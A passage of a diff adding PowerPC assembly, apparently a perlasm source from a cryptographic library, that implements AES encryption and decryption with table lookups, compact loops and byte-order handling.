+	rlwimi	$s0,$acc04,16,8,15
+	lbzx	$acc09,$Tbl2,$acc09
+	rlwimi	$s1,$acc05,16,8,15
+	lbzx	$acc10,$Tbl2,$acc10
+	rlwimi	$s2,$acc06,16,8,15
+	lbzx	$acc11,$Tbl2,$acc11
+	rlwimi	$s3,$acc07,16,8,15
+	lbzx	$acc12,$Tbl2,$acc12
+	rlwimi	$s0,$acc08,8,16,23
+	lbzx	$acc13,$Tbl2,$acc13
+	rlwimi	$s1,$acc09,8,16,23
+	lbzx	$acc14,$Tbl2,$acc14
+	rlwimi	$s2,$acc10,8,16,23
+	lbzx	$acc15,$Tbl2,$acc15
+	rlwimi	$s3,$acc11,8,16,23
+	or	$s0,$s0,$acc12
+	or	$s1,$s1,$acc13
+	or	$s2,$s2,$acc14
+	or	$s3,$s3,$acc15
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	xor	$s2,$s2,$t2
+	xor	$s3,$s3,$t3
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+.align	4
+Lppc_AES_encrypt_compact:
+	lwz	$acc00,240($key)
+	addi	$Tbl1,$Tbl0,2048
+	lwz	$t0,0($key)
+	lis	$mask80,0x8080
+	lwz	$t1,4($key)
+	lis	$mask1b,0x1b1b
+	lwz	$t2,8($key)
+	ori	$mask80,$mask80,0x8080
+	lwz	$t3,12($key)
+	ori	$mask1b,$mask1b,0x1b1b
+	addi	$key,$key,16
+	mtctr	$acc00
+.align	4
+Lenc_compact_loop:
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	rlwinm	$acc00,$s0,`32-24`,24,31
+	xor	$s2,$s2,$t2
+	rlwinm	$acc01,$s1,`32-24`,24,31
+	xor	$s3,$s3,$t3
+	rlwinm	$acc02,$s2,`32-24`,24,31
+	rlwinm	$acc03,$s3,`32-24`,24,31
+	rlwinm	$acc04,$s1,`32-16`,24,31
+	rlwinm	$acc05,$s2,`32-16`,24,31
+	rlwinm	$acc06,$s3,`32-16`,24,31
+	rlwinm	$acc07,$s0,`32-16`,24,31
+	lbzx	$acc00,$Tbl1,$acc00
+	rlwinm	$acc08,$s2,`32-8`,24,31
+	lbzx	$acc01,$Tbl1,$acc01
+	rlwinm	$acc09,$s3,`32-8`,24,31
+	lbzx	$acc02,$Tbl1,$acc02
+	rlwinm	$acc10,$s0,`32-8`,24,31
+	lbzx	$acc03,$Tbl1,$acc03
+	rlwinm	$acc11,$s1,`32-8`,24,31
+	lbzx	$acc04,$Tbl1,$acc04
+	rlwinm	$acc12,$s3,`0`,24,31
+	lbzx	$acc05,$Tbl1,$acc05
+	rlwinm	$acc13,$s0,`0`,24,31
+	lbzx	$acc06,$Tbl1,$acc06
+	rlwinm	$acc14,$s1,`0`,24,31
+	lbzx	$acc07,$Tbl1,$acc07
+	rlwinm	$acc15,$s2,`0`,24,31
+	lbzx	$acc08,$Tbl1,$acc08
+	rlwinm	$s0,$acc00,24,0,7
+	lbzx	$acc09,$Tbl1,$acc09
+	rlwinm	$s1,$acc01,24,0,7
+	lbzx	$acc10,$Tbl1,$acc10
+	rlwinm	$s2,$acc02,24,0,7
+	lbzx	$acc11,$Tbl1,$acc11
+	rlwinm	$s3,$acc03,24,0,7
+	lbzx	$acc12,$Tbl1,$acc12
+	rlwimi	$s0,$acc04,16,8,15
+	lbzx	$acc13,$Tbl1,$acc13
+	rlwimi	$s1,$acc05,16,8,15
+	lbzx	$acc14,$Tbl1,$acc14
+	rlwimi	$s2,$acc06,16,8,15
+	lbzx	$acc15,$Tbl1,$acc15
+	rlwimi	$s3,$acc07,16,8,15
+	rlwimi	$s0,$acc08,8,16,23
+	rlwimi	$s1,$acc09,8,16,23
+	rlwimi	$s2,$acc10,8,16,23
+	rlwimi	$s3,$acc11,8,16,23
+	lwz	$t0,0($key)
+	or	$s0,$s0,$acc12
+	lwz	$t1,4($key)
+	or	$s1,$s1,$acc13
+	lwz	$t2,8($key)
+	or	$s2,$s2,$acc14
+	lwz	$t3,12($key)
+	or	$s3,$s3,$acc15
+
+	addi	$key,$key,16
+	bdz	Lenc_compact_done
+
+	and	$acc00,$s0,$mask80	# r1=r0&0x80808080
+	and	$acc01,$s1,$mask80
+	and	$acc02,$s2,$mask80
+	and	$acc03,$s3,$mask80
+	srwi	$acc04,$acc00,7		# r1>>7
+	andc	$acc08,$s0,$mask80	# r0&0x7f7f7f7f
+	srwi	$acc05,$acc01,7
+	andc	$acc09,$s1,$mask80
+	srwi	$acc06,$acc02,7
+	andc	$acc10,$s2,$mask80
+	srwi	$acc07,$acc03,7
+	andc	$acc11,$s3,$mask80
+	sub	$acc00,$acc00,$acc04	# r1-(r1>>7)
+	sub	$acc01,$acc01,$acc05
+	sub	$acc02,$acc02,$acc06
+	sub	$acc03,$acc03,$acc07
+	add	$acc08,$acc08,$acc08	# (r0&0x7f7f7f7f)<<1
+	add	$acc09,$acc09,$acc09
+	add	$acc10,$acc10,$acc10
+	add	$acc11,$acc11,$acc11
+	and	$acc00,$acc00,$mask1b	# (r1-(r1>>7))&0x1b1b1b1b
+	and	$acc01,$acc01,$mask1b
+	and	$acc02,$acc02,$mask1b
+	and	$acc03,$acc03,$mask1b
+	xor	$acc00,$acc00,$acc08	# r2
+	xor	$acc01,$acc01,$acc09
+	 rotlwi	$acc12,$s0,16		# ROTATE(r0,16)
+	xor	$acc02,$acc02,$acc10
+	 rotlwi	$acc13,$s1,16
+	xor	$acc03,$acc03,$acc11
+	 rotlwi	$acc14,$s2,16
+
+	xor	$s0,$s0,$acc00		# r0^r2
+	rotlwi	$acc15,$s3,16
+	xor	$s1,$s1,$acc01
+	rotrwi	$s0,$s0,24		# ROTATE(r2^r0,24)
+	xor	$s2,$s2,$acc02
+	rotrwi	$s1,$s1,24
+	xor	$s3,$s3,$acc03
+	rotrwi	$s2,$s2,24
+	xor	$s0,$s0,$acc00		# ROTATE(r2^r0,24)^r2
+	rotrwi	$s3,$s3,24
+	xor	$s1,$s1,$acc01
+	xor	$s2,$s2,$acc02
+	xor	$s3,$s3,$acc03
+	rotlwi	$acc08,$acc12,8		# ROTATE(r0,24)
+	xor	$s0,$s0,$acc12		#
+	rotlwi	$acc09,$acc13,8
+	xor	$s1,$s1,$acc13
+	rotlwi	$acc10,$acc14,8
+	xor	$s2,$s2,$acc14
+	rotlwi	$acc11,$acc15,8
+	xor	$s3,$s3,$acc15
+	xor	$s0,$s0,$acc08		#
+	xor	$s1,$s1,$acc09
+	xor	$s2,$s2,$acc10
+	xor	$s3,$s3,$acc11
+
+	b	Lenc_compact_loop
+.align	4
+Lenc_compact_done:
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	xor	$s2,$s2,$t2
+	xor	$s3,$s3,$t3
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.AES_encrypt,.-.AES_encrypt
+
+.globl	.AES_decrypt
+.align	7
+.AES_decrypt:
+	$STU	$sp,-$FRAME($sp)
+	mflr	r0
+
+	$PUSH	$out,`$FRAME-$SIZE_T*19`($sp)
+	$PUSH	r14,`$FRAME-$SIZE_T*18`($sp)
+	$PUSH	r15,`$FRAME-$SIZE_T*17`($sp)
+	$PUSH	r16,`$FRAME-$SIZE_T*16`($sp)
+	$PUSH	r17,`$FRAME-$SIZE_T*15`($sp)
+	$PUSH	r18,`$FRAME-$SIZE_T*14`($sp)
+	$PUSH	r19,`$FRAME-$SIZE_T*13`($sp)
+	$PUSH	r20,`$FRAME-$SIZE_T*12`($sp)
+	$PUSH	r21,`$FRAME-$SIZE_T*11`($sp)
+	$PUSH	r22,`$FRAME-$SIZE_T*10`($sp)
+	$PUSH	r23,`$FRAME-$SIZE_T*9`($sp)
+	$PUSH	r24,`$FRAME-$SIZE_T*8`($sp)
+	$PUSH	r25,`$FRAME-$SIZE_T*7`($sp)
+	$PUSH	r26,`$FRAME-$SIZE_T*6`($sp)
+	$PUSH	r27,`$FRAME-$SIZE_T*5`($sp)
+	$PUSH	r28,`$FRAME-$SIZE_T*4`($sp)
+	$PUSH	r29,`$FRAME-$SIZE_T*3`($sp)
+	$PUSH	r30,`$FRAME-$SIZE_T*2`($sp)
+	$PUSH	r31,`$FRAME-$SIZE_T*1`($sp)
+	$PUSH	r0,`$FRAME+$LRSAVE`($sp)
+
+	andi.	$t0,$inp,3
+	andi.	$t1,$out,3
+	or.	$t0,$t0,$t1
+	bne	Ldec_unaligned
+
+Ldec_unaligned_ok:
+___
+$code.=<<___ if (!$LITTLE_ENDIAN);
+	lwz	$s0,0($inp)
+	lwz	$s1,4($inp)
+	lwz	$s2,8($inp)
+	lwz	$s3,12($inp)
+___
+$code.=<<___ if ($LITTLE_ENDIAN);
+	lwz	$t0,0($inp)
+	lwz	$t1,4($inp)
+	lwz	$t2,8($inp)
+	lwz	$t3,12($inp)
+	rotlwi	$s0,$t0,8
+	rotlwi	$s1,$t1,8
+	rotlwi	$s2,$t2,8
+	rotlwi	$s3,$t3,8
+	rlwimi	$s0,$t0,24,0,7
+	rlwimi	$s1,$t1,24,0,7
+	rlwimi	$s2,$t2,24,0,7
+	rlwimi	$s3,$t3,24,0,7
+	rlwimi	$s0,$t0,24,16,23
+	rlwimi	$s1,$t1,24,16,23
+	rlwimi	$s2,$t2,24,16,23
+	rlwimi	$s3,$t3,24,16,23
+___
+$code.=<<___;
+	bl	LAES_Td
+	bl	Lppc_AES_decrypt_compact
+	$POP	$out,`$FRAME-$SIZE_T*19`($sp)
+___
+$code.=<<___ if ($LITTLE_ENDIAN);
+	rotlwi	$t0,$s0,8
+	rotlwi	$t1,$s1,8
+	rotlwi	$t2,$s2,8
+	rotlwi	$t3,$s3,8
+	rlwimi	$t0,$s0,24,0,7
+	rlwimi	$t1,$s1,24,0,7
+	rlwimi	$t2,$s2,24,0,7
+	rlwimi	$t3,$s3,24,0,7
+	rlwimi	$t0,$s0,24,16,23
+	rlwimi	$t1,$s1,24,16,23
+	rlwimi	$t2,$s2,24,16,23
+	rlwimi	$t3,$s3,24,16,23
+	stw	$t0,0($out)
+	stw	$t1,4($out)
+	stw	$t2,8($out)
+	stw	$t3,12($out)
+___
+$code.=<<___ if (!$LITTLE_ENDIAN);
+	stw	$s0,0($out)
+	stw	$s1,4($out)
+	stw	$s2,8($out)
+	stw	$s3,12($out)
+___
+$code.=<<___;
+	b	Ldec_done
+
+Ldec_unaligned:
+	subfic	$t0,$inp,4096
+	subfic	$t1,$out,4096
+	andi.	$t0,$t0,4096-16
+	beq	Ldec_xpage
+	andi.	$t1,$t1,4096-16
+	bne	Ldec_unaligned_ok
+
+Ldec_xpage:
+	lbz	$acc00,0($inp)
+	lbz	$acc01,1($inp)
+	lbz	$acc02,2($inp)
+	lbz	$s0,3($inp)
+	lbz	$acc04,4($inp)
+	lbz	$acc05,5($inp)
+	lbz	$acc06,6($inp)
+	lbz	$s1,7($inp)
+	lbz	$acc08,8($inp)
+	lbz	$acc09,9($inp)
+	lbz	$acc10,10($inp)
+	insrwi	$s0,$acc00,8,0
+	lbz	$s2,11($inp)
+	insrwi	$s1,$acc04,8,0
+	lbz	$acc12,12($inp)
+	insrwi	$s0,$acc01,8,8
+	lbz	$acc13,13($inp)
+	insrwi	$s1,$acc05,8,8
+	lbz	$acc14,14($inp)
+	insrwi	$s0,$acc02,8,16
+	lbz	$s3,15($inp)
+	insrwi	$s1,$acc06,8,16
+	insrwi	$s2,$acc08,8,0
+	insrwi	$s3,$acc12,8,0
+	insrwi	$s2,$acc09,8,8
+	insrwi	$s3,$acc13,8,8
+	insrwi	$s2,$acc10,8,16
+	insrwi	$s3,$acc14,8,16
+
+	bl	LAES_Td
+	bl	Lppc_AES_decrypt_compact
+	$POP	$out,`$FRAME-$SIZE_T*19`($sp)
+
+	extrwi	$acc00,$s0,8,0
+	extrwi	$acc01,$s0,8,8
+	stb	$acc00,0($out)
+	extrwi	$acc02,$s0,8,16
+	stb	$acc01,1($out)
+	stb	$acc02,2($out)
+	extrwi	$acc04,$s1,8,0
+	stb	$s0,3($out)
+	extrwi	$acc05,$s1,8,8
+	stb	$acc04,4($out)
+	extrwi	$acc06,$s1,8,16
+	stb	$acc05,5($out)
+	stb	$acc06,6($out)
+	extrwi	$acc08,$s2,8,0
+	stb	$s1,7($out)
+	extrwi	$acc09,$s2,8,8
+	stb	$acc08,8($out)
+	extrwi	$acc10,$s2,8,16
+	stb	$acc09,9($out)
+	stb	$acc10,10($out)
+	extrwi	$acc12,$s3,8,0
+	stb	$s2,11($out)
+	extrwi	$acc13,$s3,8,8
+	stb	$acc12,12($out)
+	extrwi	$acc14,$s3,8,16
+	stb	$acc13,13($out)
+	stb	$acc14,14($out)
+	stb	$s3,15($out)
+
+Ldec_done:
+	$POP	r0,`$FRAME+$LRSAVE`($sp)
+	$POP	r14,`$FRAME-$SIZE_T*18`($sp)
+	$POP	r15,`$FRAME-$SIZE_T*17`($sp)
+	$POP	r16,`$FRAME-$SIZE_T*16`($sp)
+	$POP	r17,`$FRAME-$SIZE_T*15`($sp)
+	$POP	r18,`$FRAME-$SIZE_T*14`($sp)
+	$POP	r19,`$FRAME-$SIZE_T*13`($sp)
+	$POP	r20,`$FRAME-$SIZE_T*12`($sp)
+	$POP	r21,`$FRAME-$SIZE_T*11`($sp)
+	$POP	r22,`$FRAME-$SIZE_T*10`($sp)
+	$POP	r23,`$FRAME-$SIZE_T*9`($sp)
+	$POP	r24,`$FRAME-$SIZE_T*8`($sp)
+	$POP	r25,`$FRAME-$SIZE_T*7`($sp)
+	$POP	r26,`$FRAME-$SIZE_T*6`($sp)
+	$POP	r27,`$FRAME-$SIZE_T*5`($sp)
+	$POP	r28,`$FRAME-$SIZE_T*4`($sp)
+	$POP	r29,`$FRAME-$SIZE_T*3`($sp)
+	$POP	r30,`$FRAME-$SIZE_T*2`($sp)
+	$POP	r31,`$FRAME-$SIZE_T*1`($sp)
+	mtlr	r0
+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,4,1,0x80,18,3,0
+	.long	0
+
+.align	5
+Lppc_AES_decrypt:
+	lwz	$acc00,240($key)
+	addi	$Tbl1,$Tbl0,3
+	lwz	$t0,0($key)
+	addi	$Tbl2,$Tbl0,2
+	lwz	$t1,4($key)
+	addi	$Tbl3,$Tbl0,1
+	lwz	$t2,8($key)
+	addi	$acc00,$acc00,-1
+	lwz	$t3,12($key)
+	addi	$key,$key,16
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	xor	$s2,$s2,$t2
+	xor	$s3,$s3,$t3
+	mtctr	$acc00
+.align	4
+Ldec_loop:
+	rlwinm	$acc00,$s0,`32-24+3`,21,28
+	rlwinm	$acc01,$s1,`32-24+3`,21,28
+	rlwinm	$acc02,$s2,`32-24+3`,21,28
+	rlwinm	$acc03,$s3,`32-24+3`,21,28
+	lwz	$t0,0($key)
+	rlwinm	$acc04,$s3,`32-16+3`,21,28
+	lwz	$t1,4($key)
+	rlwinm	$acc05,$s0,`32-16+3`,21,28
+	lwz	$t2,8($key)
+	rlwinm	$acc06,$s1,`32-16+3`,21,28
+	lwz	$t3,12($key)
+	rlwinm	$acc07,$s2,`32-16+3`,21,28
+	lwzx	$acc00,$Tbl0,$acc00
+	rlwinm	$acc08,$s2,`32-8+3`,21,28
+	lwzx	$acc01,$Tbl0,$acc01
+	rlwinm	$acc09,$s3,`32-8+3`,21,28
+	lwzx	$acc02,$Tbl0,$acc02
+	rlwinm	$acc10,$s0,`32-8+3`,21,28
+	lwzx	$acc03,$Tbl0,$acc03
+	rlwinm	$acc11,$s1,`32-8+3`,21,28
+	lwzx	$acc04,$Tbl1,$acc04
+	rlwinm	$acc12,$s1,`0+3`,21,28
+	lwzx	$acc05,$Tbl1,$acc05
+	rlwinm	$acc13,$s2,`0+3`,21,28
+	lwzx	$acc06,$Tbl1,$acc06
+	rlwinm	$acc14,$s3,`0+3`,21,28
+	lwzx	$acc07,$Tbl1,$acc07
+	rlwinm	$acc15,$s0,`0+3`,21,28
+	lwzx	$acc08,$Tbl2,$acc08
+	xor	$t0,$t0,$acc00
+	lwzx	$acc09,$Tbl2,$acc09
+	xor	$t1,$t1,$acc01
+	lwzx	$acc10,$Tbl2,$acc10
+	xor	$t2,$t2,$acc02
+	lwzx	$acc11,$Tbl2,$acc11
+	xor	$t3,$t3,$acc03
+	lwzx	$acc12,$Tbl3,$acc12
+	xor	$t0,$t0,$acc04
+	lwzx	$acc13,$Tbl3,$acc13
+	xor	$t1,$t1,$acc05
+	lwzx	$acc14,$Tbl3,$acc14
+	xor	$t2,$t2,$acc06
+	lwzx	$acc15,$Tbl3,$acc15
+	xor	$t3,$t3,$acc07
+	xor	$t0,$t0,$acc08
+	xor	$t1,$t1,$acc09
+	xor	$t2,$t2,$acc10
+	xor	$t3,$t3,$acc11
+	xor	$s0,$t0,$acc12
+	xor	$s1,$t1,$acc13
+	xor	$s2,$t2,$acc14
+	xor	$s3,$t3,$acc15
+	addi	$key,$key,16
+	bdnz-	Ldec_loop
+
+	addi	$Tbl2,$Tbl0,2048
+	nop
+	lwz	$t0,0($key)
+	rlwinm	$acc00,$s0,`32-24`,24,31
+	lwz	$t1,4($key)
+	rlwinm	$acc01,$s1,`32-24`,24,31
+	lwz	$t2,8($key)
+	rlwinm	$acc02,$s2,`32-24`,24,31
+	lwz	$t3,12($key)
+	rlwinm	$acc03,$s3,`32-24`,24,31
+	lwz	$acc08,`2048+0`($Tbl0)	! prefetch Td4
+	rlwinm	$acc04,$s3,`32-16`,24,31
+	lwz	$acc09,`2048+32`($Tbl0)
+	rlwinm	$acc05,$s0,`32-16`,24,31
+	lwz	$acc10,`2048+64`($Tbl0)
+	lbzx	$acc00,$Tbl2,$acc00
+	lwz	$acc11,`2048+96`($Tbl0)
+	lbzx	$acc01,$Tbl2,$acc01
+	lwz	$acc12,`2048+128`($Tbl0)
+	rlwinm	$acc06,$s1,`32-16`,24,31
+	lwz	$acc13,`2048+160`($Tbl0)
+	rlwinm	$acc07,$s2,`32-16`,24,31
+	lwz	$acc14,`2048+192`($Tbl0)
+	rlwinm	$acc08,$s2,`32-8`,24,31
+	lwz	$acc15,`2048+224`($Tbl0)
+	rlwinm	$acc09,$s3,`32-8`,24,31
+	lbzx	$acc02,$Tbl2,$acc02
+	rlwinm	$acc10,$s0,`32-8`,24,31
+	lbzx	$acc03,$Tbl2,$acc03
+	rlwinm	$acc11,$s1,`32-8`,24,31
+	lbzx	$acc04,$Tbl2,$acc04
+	rlwinm	$acc12,$s1,`0`,24,31
+	lbzx	$acc05,$Tbl2,$acc05
+	rlwinm	$acc13,$s2,`0`,24,31
+	lbzx	$acc06,$Tbl2,$acc06
+	rlwinm	$acc14,$s3,`0`,24,31
+	lbzx	$acc07,$Tbl2,$acc07
+	rlwinm	$acc15,$s0,`0`,24,31
+	lbzx	$acc08,$Tbl2,$acc08
+	rlwinm	$s0,$acc00,24,0,7
+	lbzx	$acc09,$Tbl2,$acc09
+	rlwinm	$s1,$acc01,24,0,7
+	lbzx	$acc10,$Tbl2,$acc10
+	rlwinm	$s2,$acc02,24,0,7
+	lbzx	$acc11,$Tbl2,$acc11
+	rlwinm	$s3,$acc03,24,0,7
+	lbzx	$acc12,$Tbl2,$acc12
+	rlwimi	$s0,$acc04,16,8,15
+	lbzx	$acc13,$Tbl2,$acc13
+	rlwimi	$s1,$acc05,16,8,15
+	lbzx	$acc14,$Tbl2,$acc14
+	rlwimi	$s2,$acc06,16,8,15
+	lbzx	$acc15,$Tbl2,$acc15
+	rlwimi	$s3,$acc07,16,8,15
+	rlwimi	$s0,$acc08,8,16,23
+	rlwimi	$s1,$acc09,8,16,23
+	rlwimi	$s2,$acc10,8,16,23
+	rlwimi	$s3,$acc11,8,16,23
+	or	$s0,$s0,$acc12
+	or	$s1,$s1,$acc13
+	or	$s2,$s2,$acc14
+	or	$s3,$s3,$acc15
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	xor	$s2,$s2,$t2
+	xor	$s3,$s3,$t3
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+.align	4
+Lppc_AES_decrypt_compact:
+	lwz	$acc00,240($key)
+	addi	$Tbl1,$Tbl0,2048
+	lwz	$t0,0($key)
+	lis	$mask80,0x8080
+	lwz	$t1,4($key)
+	lis	$mask1b,0x1b1b
+	lwz	$t2,8($key)
+	ori	$mask80,$mask80,0x8080
+	lwz	$t3,12($key)
+	ori	$mask1b,$mask1b,0x1b1b
+	addi	$key,$key,16
+___
+$code.=<<___ if ($SIZE_T==8);
+	insrdi	$mask80,$mask80,32,0
+	insrdi	$mask1b,$mask1b,32,0
+___
+$code.=<<___;
+	mtctr	$acc00
+.align	4
+Ldec_compact_loop:
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	rlwinm	$acc00,$s0,`32-24`,24,31
+	xor	$s2,$s2,$t2
+	rlwinm	$acc01,$s1,`32-24`,24,31
+	xor	$s3,$s3,$t3
+	rlwinm	$acc02,$s2,`32-24`,24,31
+	rlwinm	$acc03,$s3,`32-24`,24,31
+	rlwinm	$acc04,$s3,`32-16`,24,31
+	rlwinm	$acc05,$s0,`32-16`,24,31
+	rlwinm	$acc06,$s1,`32-16`,24,31
+	rlwinm	$acc07,$s2,`32-16`,24,31
+	lbzx	$acc00,$Tbl1,$acc00
+	rlwinm	$acc08,$s2,`32-8`,24,31
+	lbzx	$acc01,$Tbl1,$acc01
+	rlwinm	$acc09,$s3,`32-8`,24,31
+	lbzx	$acc02,$Tbl1,$acc02
+	rlwinm	$acc10,$s0,`32-8`,24,31
+	lbzx	$acc03,$Tbl1,$acc03
+	rlwinm	$acc11,$s1,`32-8`,24,31
+	lbzx	$acc04,$Tbl1,$acc04
+	rlwinm	$acc12,$s1,`0`,24,31
+	lbzx	$acc05,$Tbl1,$acc05
+	rlwinm	$acc13,$s2,`0`,24,31
+	lbzx	$acc06,$Tbl1,$acc06
+	rlwinm	$acc14,$s3,`0`,24,31
+	lbzx	$acc07,$Tbl1,$acc07
+	rlwinm	$acc15,$s0,`0`,24,31
+	lbzx	$acc08,$Tbl1,$acc08
+	rlwinm	$s0,$acc00,24,0,7
+	lbzx	$acc09,$Tbl1,$acc09
+	rlwinm	$s1,$acc01,24,0,7
+	lbzx	$acc10,$Tbl1,$acc10
+	rlwinm	$s2,$acc02,24,0,7
+	lbzx	$acc11,$Tbl1,$acc11
+	rlwinm	$s3,$acc03,24,0,7
+	lbzx	$acc12,$Tbl1,$acc12
+	rlwimi	$s0,$acc04,16,8,15
+	lbzx	$acc13,$Tbl1,$acc13
+	rlwimi	$s1,$acc05,16,8,15
+	lbzx	$acc14,$Tbl1,$acc14
+	rlwimi	$s2,$acc06,16,8,15
+	lbzx	$acc15,$Tbl1,$acc15
+	rlwimi	$s3,$acc07,16,8,15
+	rlwimi	$s0,$acc08,8,16,23
+	rlwimi	$s1,$acc09,8,16,23
+	rlwimi	$s2,$acc10,8,16,23
+	rlwimi	$s3,$acc11,8,16,23
+	lwz	$t0,0($key)
+	or	$s0,$s0,$acc12
+	lwz	$t1,4($key)
+	or	$s1,$s1,$acc13
+	lwz	$t2,8($key)
+	or	$s2,$s2,$acc14
+	lwz	$t3,12($key)
+	or	$s3,$s3,$acc15
+
+	addi	$key,$key,16
+	bdz	Ldec_compact_done
+___
+$code.=<<___ if ($SIZE_T==8);
+	# vectorized permutation improves decrypt performance by 10%
+	insrdi	$s0,$s1,32,0
+	insrdi	$s2,$s3,32,0
+
+	and	$acc00,$s0,$mask80	# r1=r0&0x80808080
+	and	$acc02,$s2,$mask80
+	srdi	$acc04,$acc00,7		# r1>>7
+	srdi	$acc06,$acc02,7
+	andc	$acc08,$s0,$mask80	# r0&0x7f7f7f7f
+	andc	$acc10,$s2,$mask80
+	sub	$acc00,$acc00,$acc04	# r1-(r1>>7)
+	sub	$acc02,$acc02,$acc06
+	add	$acc08,$acc08,$acc08	# (r0&0x7f7f7f7f)<<1
+	add	$acc10,$acc10,$acc10
+	and	$acc00,$acc00,$mask1b	# (r1-(r1>>7))&0x1b1b1b1b
+	and	$acc02,$acc02,$mask1b
+	xor	$acc00,$acc00,$acc08	# r2
+	xor	$acc02,$acc02,$acc10
+
+	and	$acc04,$acc00,$mask80	# r1=r2&0x80808080
+	and	$acc06,$acc02,$mask80
+	srdi	$acc08,$acc04,7		# r1>>7
+	srdi	$acc10,$acc06,7
+	andc	$acc12,$acc00,$mask80	# r2&0x7f7f7f7f
+	andc	$acc14,$acc02,$mask80
+	sub	$acc04,$acc04,$acc08	# r1-(r1>>7)
+	sub	$acc06,$acc06,$acc10
+	add	$acc12,$acc12,$acc12	# (r2&0x7f7f7f7f)<<1
+	add	$acc14,$acc14,$acc14
+	and	$acc04,$acc04,$mask1b	# (r1-(r1>>7))&0x1b1b1b1b
+	and	$acc06,$acc06,$mask1b
+	xor	$acc04,$acc04,$acc12	# r4
+	xor	$acc06,$acc06,$acc14
+
+	and	$acc08,$acc04,$mask80	# r1=r4&0x80808080
+	and	$acc10,$acc06,$mask80
+	srdi	$acc12,$acc08,7		# r1>>7
+	srdi	$acc14,$acc10,7
+	sub	$acc08,$acc08,$acc12	# r1-(r1>>7)
+	sub	$acc10,$acc10,$acc14
+	andc	$acc12,$acc04,$mask80	# r4&0x7f7f7f7f
+	andc	$acc14,$acc06,$mask80
+	add	$acc12,$acc12,$acc12	# (r4&0x7f7f7f7f)<<1
+	add	$acc14,$acc14,$acc14
+	and	$acc08,$acc08,$mask1b	# (r1-(r1>>7))&0x1b1b1b1b
+	and	$acc10,$acc10,$mask1b
+	xor	$acc08,$acc08,$acc12	# r8
+	xor	$acc10,$acc10,$acc14
+
+	xor	$acc00,$acc00,$s0	# r2^r0
+	xor	$acc02,$acc02,$s2
+	xor	$acc04,$acc04,$s0	# r4^r0
+	xor	$acc06,$acc06,$s2
+
+	extrdi	$acc01,$acc00,32,0
+	extrdi	$acc03,$acc02,32,0
+	extrdi	$acc05,$acc04,32,0
+	extrdi	$acc07,$acc06,32,0
+	extrdi	$acc09,$acc08,32,0
+	extrdi	$acc11,$acc10,32,0
+___
+$code.=<<___ if ($SIZE_T==4);
+	and	$acc00,$s0,$mask80	# r1=r0&0x80808080
+	and	$acc01,$s1,$mask80
+	and	$acc02,$s2,$mask80
+	and	$acc03,$s3,$mask80
+	srwi	$acc04,$acc00,7		# r1>>7
+	andc	$acc08,$s0,$mask80	# r0&0x7f7f7f7f
+	srwi	$acc05,$acc01,7
+	andc	$acc09,$s1,$mask80
+	srwi	$acc06,$acc02,7
+	andc	$acc10,$s2,$mask80
+	srwi	$acc07,$acc03,7
+	andc	$acc11,$s3,$mask80
+	sub	$acc00,$acc00,$acc04	# r1-(r1>>7)
+	sub	$acc01,$acc01,$acc05
+	sub	$acc02,$acc02,$acc06
+	sub	$acc03,$acc03,$acc07
+	add	$acc08,$acc08,$acc08	# (r0&0x7f7f7f7f)<<1
+	add	$acc09,$acc09,$acc09
+	add	$acc10,$acc10,$acc10
+	add	$acc11,$acc11,$acc11
+	and	$acc00,$acc00,$mask1b	# (r1-(r1>>7))&0x1b1b1b1b
+	and	$acc01,$acc01,$mask1b
+	and	$acc02,$acc02,$mask1b
+	and	$acc03,$acc03,$mask1b
+	xor	$acc00,$acc00,$acc08	# r2
+	xor	$acc01,$acc01,$acc09
+	xor	$acc02,$acc02,$acc10
+	xor	$acc03,$acc03,$acc11
+
+	and	$acc04,$acc00,$mask80	# r1=r2&0x80808080
+	and	$acc05,$acc01,$mask80
+	and	$acc06,$acc02,$mask80
+	and	$acc07,$acc03,$mask80
+	srwi	$acc08,$acc04,7		# r1>>7
+	andc	$acc12,$acc00,$mask80	# r2&0x7f7f7f7f
+	srwi	$acc09,$acc05,7
+	andc	$acc13,$acc01,$mask80
+	srwi	$acc10,$acc06,7
+	andc	$acc14,$acc02,$mask80
+	srwi	$acc11,$acc07,7
+	andc	$acc15,$acc03,$mask80
+	sub	$acc04,$acc04,$acc08	# r1-(r1>>7)
+	sub	$acc05,$acc05,$acc09
+	sub	$acc06,$acc06,$acc10
+	sub	$acc07,$acc07,$acc11
+	add	$acc12,$acc12,$acc12	# (r2&0x7f7f7f7f)<<1
+	add	$acc13,$acc13,$acc13
+	add	$acc14,$acc14,$acc14
+	add	$acc15,$acc15,$acc15
+	and	$acc04,$acc04,$mask1b	# (r1-(r1>>7))&0x1b1b1b1b
+	and	$acc05,$acc05,$mask1b
+	and	$acc06,$acc06,$mask1b
+	and	$acc07,$acc07,$mask1b
+	xor	$acc04,$acc04,$acc12	# r4
+	xor	$acc05,$acc05,$acc13
+	xor	$acc06,$acc06,$acc14
+	xor	$acc07,$acc07,$acc15
+
+	and	$acc08,$acc04,$mask80	# r1=r4&0x80808080
+	and	$acc09,$acc05,$mask80
+	srwi	$acc12,$acc08,7		# r1>>7
+	and	$acc10,$acc06,$mask80
+	srwi	$acc13,$acc09,7
+	and	$acc11,$acc07,$mask80
+	srwi	$acc14,$acc10,7
+	sub	$acc08,$acc08,$acc12	# r1-(r1>>7)
+	srwi	$acc15,$acc11,7
+	sub	$acc09,$acc09,$acc13
+	sub	$acc10,$acc10,$acc14
+	sub	$acc11,$acc11,$acc15
+	andc	$acc12,$acc04,$mask80	# r4&0x7f7f7f7f
+	andc	$acc13,$acc05,$mask80
+	andc	$acc14,$acc06,$mask80
+	andc	$acc15,$acc07,$mask80
+	add	$acc12,$acc12,$acc12	# (r4&0x7f7f7f7f)<<1
+	add	$acc13,$acc13,$acc13
+	add	$acc14,$acc14,$acc14
+	add	$acc15,$acc15,$acc15
+	and	$acc08,$acc08,$mask1b	# (r1-(r1>>7))&0x1b1b1b1b
